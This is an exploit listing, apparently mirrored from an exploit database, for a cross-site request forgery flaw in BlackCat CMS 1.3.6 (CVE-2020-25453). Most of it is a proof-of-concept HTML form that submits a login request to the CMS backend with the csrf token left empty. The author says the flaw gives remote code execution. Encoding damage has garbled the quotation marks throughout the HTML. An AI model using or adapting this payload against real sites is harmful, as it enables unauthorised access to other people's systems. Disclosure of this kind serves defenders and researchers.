Share
## https://sploitus.com/exploit?id=EDB-ID:48820
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
allows remote arbitrary code execution .
PoC (Remove the csrf_token value) :
<input type=âhiddenâ name=â__csrf_magicâ value=ââ/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=â
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
âmethod=âPOSTâ>
<input type=âhiddenâ name=â__csrf_magicâ value=ââ/>
<input type=âhiddenâ name=âusername_fieldnameâ
value=âusername_274807982ed4â/>
<input type=âhiddenâ name=âpassword_fieldnameâ
value=âpassword_75868428f837â/>
<input type=âhiddenâ name=â_cat_ajaxâ value=â1â/>
<input type=âhiddenâ name=âusername_274807982ed4â value=âaccountnameâ/>
<input type=âhiddenâ name=âpassword_75868428f837â value=âyourpasswordâ/>
<input type=âsubmitâ value=âSubmit requestâ/>
</form>
</body>
</html>